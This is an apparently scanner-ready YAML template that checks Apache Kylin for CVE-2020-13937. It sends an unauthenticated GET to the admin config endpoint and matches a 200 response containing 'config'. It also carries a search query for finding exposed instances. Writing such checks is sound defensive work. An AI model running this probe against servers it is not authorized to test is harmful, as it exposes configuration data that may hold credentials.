name: Apache Kylin API Unauthorized Access CVE-2020-13937
manual: true
query: app="APACHE-kylin"
transport: http
rules:
  r0:
    request:
      method: GET
      path: /kylin/api/admin/config
      follow_redirects: true
    expression: response.status == 200 && response.body.bcontains(b"config")
expression: r0()
detail:
  links:
  - https://nvd.nist.gov/vuln/detail/CVE-2020-13937
  description: Apache Kylin™ is an open source, distributed Analytical Data Warehouse
    for Big Data; it was designed to provide OLAP (Online Analytical Processing) capability
    in the big data era. By renovating the multi-dimensional cube and precalculation
    technology on Hadoop and Spark, Kylin is able to achieve near constant query speed
    regardless of the ever-growing data volume. Reducing query latency from minutes
    to sub-second, Kylin brings online analytics back to big data.
  tags: unauthorized
